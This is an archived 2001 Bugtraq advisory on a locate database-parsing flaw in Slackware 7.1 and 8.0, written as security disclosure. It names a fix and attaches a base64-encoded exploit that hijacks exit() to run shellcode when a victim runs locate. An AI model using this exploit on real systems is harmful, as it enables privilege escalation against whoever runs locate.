Date: Wed, 1 Aug 2001 12:03:58 -0400 (EDT)
From: Josh Smith <josh@viper.falcon-networks.com>
To: bugtraq@securityfocus.com
Subject: Slackware 8.0, 7.1 Vulnerability: /usr/bin/locate
---858225934-601500530-996681838=:802
Content-Type: TEXT/PLAIN; charset=US-ASCII
Submitted by : Josh (josh@viper.falcon-networks.com), lockdown
(lockdown@lockeddown.net), zen-parse (zen-parse@gmx.net)
Vulnerability : /usr/bin/locate (findutils-4.1 and before)
Tested On : Slackware 8.0, Slackware 7.1
Local : Yes
Remote : No
Fix : Update to slocate
Target : root or any other user that runs locate
Requires : UID nobody
Greets to : alpha, fr3n3tic, omega, eazyass, Remmy, RedPen, banned-it,
slider, cryptix, s0ttle, xphantom, qtip, tirancy,
Defiance, KraZee, synexic, Insane, rusko,
falcon-networks.com, mp3.com/cosv.
Other Stuff : We all (individually) need jobs. E-mail the contact
people with [WE HAVE A JOB FOR YOU] in the subject.
In slackware, and possibly other distributions, it is possible to
modify the locate database if one were to obtain UID nobody. This allows
locate to act as a sort of 'trojan' having anyone who executes it
unknowingly execute potentially malicious code.
It works by taking advantage of the fact locate accepts old
format databases. LOCATEDB_OLD_ESCAPE (char 30) is followed by an offset,
stored in a signed integer, for how many characters to add to the current
character pointer in the path. It doesn't perform any sanity checking of
the input. This exploit tells it to move the pointer back a long way,
back past the beginning of the string, all the way to the GOT address for
exit() which then gets the address of the shellcode added, and the
program then runs out of database and executes our code.
There is also probably a similar vulnerability in the new format.
P.S. dies: If you see this e-mail josh@viper.falcon-networks.com
---858225934-601500530-996681838=:802
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="locate-exploit.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.33.0108011203580.802@viper.falcon-networks.com>
Content-Description: exploit
Content-Disposition: attachment; filename="locate-exploit.c"
I2luY2x1ZGUgPHN0ZGlvLmg+DQoNCmNoYXIgc2hlbGxjb2RlW10gPQ0KICAg
Ilx4ZWJceDE4XHg1ZVx4ODlceDc2XHgwOFx4MzFceGMwXHg4OFx4NDZceDA3
XHg4OVx4NDYiDQogICAiXHgwY1x4ODlceGYzXHg4ZFx4NGVceDA4XHg4ZFx4
NTZceDBjXHhiMFx4MGJceGNkXHg4MCINCiAgICJceGU4XHhlM1x4ZmZceGZm
XHhmZi90bXAveHgiOw0KY2hhciBwdXRzaGVsbFtdID0NCiAgICJceDE0XHg4
NFx4ODVceDg2XHg4N1x4ODhceDg5XHg4YVx4OGJceDhjIg0KICAgIlx4OGRc
eDhlXHg4Zlx4OTBceDkxXHg5Mlx4OTNceDk0XHg5NVx4OTYiOw0KDQppbnQg
bWFpbih2b2lkKQ0Kew0KICAgaW50IGk7DQogICBpbnQgejA9MDsgaW50IGFk
ZHI9MHgwODA0YTk3MDsNCiAgIGludCB6MT0wOyBpbnQgYWRkcjI9LTYyNjsN
CiAgIGludCB6Mj0wOyBpbnQgYWRkcjM9YWRkcis2Ow0KICAgcHJpbnRmKCIl
cyIsICZhZGRyKTsNCiAgIHByaW50ZigiJXMiLCAmYWRkcjMpOw0KICAgcHJp
bnRmKCIlcyIsc2hlbGxjb2RlKTsNCiAgIGZmbHVzaChzdGRvdXQpOw0KICAg
Zm9yKGk9NDY7aTwyNTY7aSsrKSBwdXRjaGFyKCdBJyk7DQogICBwcmludGYo
IiVzIiwgcHV0c2hlbGwpOw0KICAgZmZsdXNoKHN0ZG91dCk7DQogICBwdXRj
aGFyKDApOw0KICAgcHV0Y2hhcigzMCk7DQogICBwcmludGYoIiVzIiwgJmFk
ZHIyKTsNCiAgIHByaW50ZigiXHg4Mlx4ODMiKTsNCiAgIGZmbHVzaChzdGRv
dXQpOw0KfQ0KDQoNCg0KDQoNCg0K
---858225934-601500530-996681838=:802--
